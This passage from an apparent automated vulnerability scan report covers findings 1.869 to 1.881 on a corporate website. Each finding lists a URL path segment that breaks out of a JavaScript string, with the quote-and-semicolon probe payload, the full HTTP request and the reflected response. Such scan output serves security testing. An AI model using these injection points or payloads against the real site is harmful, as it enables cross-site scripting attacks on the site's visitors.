Last-Modified: Wed, 17 Nov 2010 01:00:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41122
Date: Wed, 17 Nov 2010 01:00:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/se/solutionsce82f';6173aab2f5f/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.869. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /se/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b7f9"%3b3ade5f339cc was submitted in the REST URL parameter 3. This input was echoed as 6b7f9";3ade5f339cc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se/solutions/var6b7f9"%3b3ade5f339cc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:13 GMT
Content-Type: text/html
Content-Length: 42334
Date: Wed, 17 Nov 2010 01:00:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/se/solutions/var6b7f9";3ade5f339cc/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.870. http://www.verizonbusiness.com/se/solutions/var/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /se/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28959'%3bb5535bd39ac was submitted in the REST URL parameter 3. This input was echoed as 28959';b5535bd39ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se/solutions/var28959'%3bb5535bd39ac/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42336
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/se/solutions/var28959';b5535bd39ac/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.871. http://www.verizonbusiness.com/sg/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /sg/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94dbf'%3b0009227c96d was submitted in the REST URL parameter 1. This input was echoed as 94dbf';0009227c96d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sg94dbf'%3b0009227c96d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:59:33 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:59:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/sg94dbf';0009227c96d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.872. http://www.verizonbusiness.com/sg/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /sg/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9474a"%3b1f1fd3e3623 was submitted in the REST URL parameter 1. This input was echoed as 9474a";1f1fd3e3623 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sg9474a"%3b1f1fd3e3623/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:59:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40615
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:59:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:59:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/sg9474a";1f1fd3e3623/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.873. http://www.verizonbusiness.com/sitemap/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /sitemap/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a60bc'%3b6a7ca198b5c was submitted in the REST URL parameter 1. This input was echoed as a60bc';6a7ca198b5c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemapa60bc'%3b6a7ca198b5c/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40616
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/sitemapa60bc';6a7ca198b5c/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.874. http://www.verizonbusiness.com/sitemap/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /sitemap/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 506d2"%3ba3241f7926e was submitted in the REST URL parameter 1. This input was echoed as 506d2";a3241f7926e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap506d2"%3ba3241f7926e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40614
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/sitemap506d2";a3241f7926e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.875. http://www.verizonbusiness.com/solutions/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2488"%3bfcc25c962ee was submitted in the REST URL parameter 1. This input was echoed as c2488";fcc25c962ee in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsc2488"%3bfcc25c962ee/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40618
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsc2488";fcc25c962ee/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.876. http://www.verizonbusiness.com/solutions/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29b0a'%3b9f85ea7704b was submitted in the REST URL parameter 1. This input was echoed as 29b0a';9f85ea7704b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions29b0a'%3b9f85ea7704b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:51 GMT
Content-Type: text/html
Content-Length: 40620
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions29b0a';9f85ea7704b/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.877. http://www.verizonbusiness.com/solutions/byindustry/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byindustry/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b355'%3b36a4f30df9b was submitted in the REST URL parameter 1. This input was echoed as 4b355';36a4f30df9b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions4b355'%3b36a4f30df9b/byindustry/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:40 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions4b355';36a4f30df9b/byindustry/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.878. http://www.verizonbusiness.com/solutions/byindustry/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byindustry/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8322"%3bbe69c229289 was submitted in the REST URL parameter 1. This input was echoed as d8322";be69c229289 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsd8322"%3bbe69c229289/byindustry/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:32 GMT
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsd8322";be69c229289/byindustry/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.879. http://www.verizonbusiness.com/solutions/byindustry/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byindustry/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37469"%3bf318f02565e was submitted in the REST URL parameter 2. This input was echoed as 37469";f318f02565e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byindustry37469"%3bf318f02565e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:54 GMT
Content-Type: text/html
Content-Length: 41854
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byindustry37469";f318f02565e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.880. http://www.verizonbusiness.com/solutions/byindustry/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byindustry/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e2d4'%3bb381d26f8ba was submitted in the REST URL parameter 2. This input was echoed as 2e2d4';b381d26f8ba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byindustry2e2d4'%3bb381d26f8ba/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:59 GMT
Content-Type: text/html
Content-Length: 41854
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byindustry2e2d4';b381d26f8ba/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.881. http://www.verizonbusiness.com/solutions/byneed/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d271a"%3b4ce5826d283 was submitted in the REST URL parameter 1. This input was echoed as d271a";4ce5826d283 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsd271a"%3b4ce5826d283/byneed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:51 GMT
Content-Type: text/html
Content-Length: 40634
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
